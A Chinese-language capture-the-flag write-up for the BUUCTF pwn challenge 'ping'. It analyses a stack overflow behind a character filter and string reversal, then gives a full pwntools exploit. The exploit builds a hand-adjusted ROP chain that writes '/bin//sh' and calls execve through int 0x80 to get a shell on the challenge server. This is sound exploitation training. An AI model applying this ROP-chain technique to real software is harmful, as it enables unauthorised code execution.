[BUUCTF-pwn] ping

rop题

题目看上去不难只有几段

  v7 = 322423550;
  printf("ping> ");
  _isoc99_scanf("%511s", src);
  s = (char *)&unk_80BCEC8;
  for ( i = src; *i; ++i )                      // payload不能出现指定字符 ba c4 7 1c d1 ac 83 3 同时 a,0也不行
  {
    if ( strchr(s, *i) )
    {
      puts(&unk_80BCED1);
      exit(-1);
    }
  }
  v9 = src;
  v8 = &src[strlen(src) - 1];
  while ( v9 < v8 )                             // 反转
  {
    v5 = *v9;
    v0 = v9++;
    *v0 = *v8;
    v1 = v8--;
    *v1 = v5;
  }
  printf("pong> %snn");
  result = strcpy(dest, src);
  if ( v7 != 322423550 )                        // 检查v7 = 
  {
    puts(&unk_80BCED1);
    exit(-1);
  }
  return result;
}

1. 先用scanf读入串
2. 然后过滤禁用字符，这里就7比较麻烦
3. 过滤后将串反转，并复制到dest，这里dest定义很小，有溢出
4. 检查v7是否正确
5. 然后就执行

静态编译的题有很多rop可用，padding加上生成的rop,反转后写进去就行了，但这里有个过滤7，另外串由scanf读入也不能有0或者n t等字符。

作法就是先用ROPgadget  的ropchain生成个payload然后再把带禁用字符的改掉

生成的内容：

payload  = ''

payload += pack(' 
改好的内容：
 
from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
    libc_elf = ELF("/home/shi/libc6-i386_2.23-0ubuntu11.3/libc-2.23.so")
    one = [0x3a81c,0x3a81e,0x3a822,0x3a829,0x5f075,0x5f076]
    offset_main_ret = 0x18647
else:
    p = remote('node4.buuoj.cn', 25638) 
    libc_elf = ELF('../libc6-i386_2.23-0ubuntu10_amd64.so')
    one = [0x3a80c,0x3a80e,0x3a812,0x3a819,0x5f065,0x5f066]
    offset_main_ret = 0x18637

elf = ELF('./pwn')
context(arch='i386', log_level='debug')

# no 07 03 0a 
payload  = b'A'*(0x230-0x20b)+ p32(322423550)+ b'A'*24

# 0x080ec030 /bin
payload += p32(0x0806fe6a) # pop edx ; ret
payload += p32(0x080ec030) # @ .data   c000 -> c020
payload += p32(0x080e05f5) # pop ecx ; ret
payload += b'/bin'
payload += p32(0x0805fa54) # 0x0805fa54 : mov dword ptr [edx], ecx ; mov eax, dword ptr [esp + 4] ; ret

# 0x080ec030 /bin//sh
payload += p32(0x0806fe6a) # pop edx ; ret
payload += p32(0x080ec034) # @ .data + 4
payload += p32(0x080e05f5) # pop ecx ; ret
payload += b'//sh'
payload += p32(0x0805fa54) # 0x0805fa54 : mov dword ptr [edx], ecx ; mov eax, dword ptr [esp + 4] ; ret

# 0x080ec030 /bin//sh
payload += p32(0x0806fe6a) # pop edx ; ret  
payload += p32(0x080ec038) # @ .data + 8
payload += p32(0x08049573) # xor eax, eax ; ret
payload += p32(0x0805596b) # mov dword ptr [edx], eax ; ret

#eax=11  xor eax,eax;  inc eax; pop edi; xxx  
payload += p32(0x08049573) # xor eax, eax ; ret
payload += (p32(0x0805d633)+ b'AAAA')*11 # 0x0805d633 : inc eax ; pop edi ; ret

#ebx= 0x090ec030 
payload += p32(0x080e1655) # pop ebx ; ret
payload += p32(0x080ec030) # @ .data
#ecx= 0x090ec038
payload += p32(0x080e05f5) # pop ecx ; ret
payload += p32(0x080ec038) # @ .data
#edx=0x090ec038
payload += p32(0x0806fe6a) # pop edx ; ret
payload += p32(0x080ec038) # @ .data + 8

payload += p32(0x0806d9c5) # int 0x80

#gdb.attach(p, "b*0x8048bbe")

p.sendlineafter(b"ping> ", payload[::-1])
p.recv()

p.sendline(b'cat /flag')
p.interactive()
 
这里带7的比较麻烦，因为程序一大段都在0x0807xxxx上，很多rop给禁用了。还有a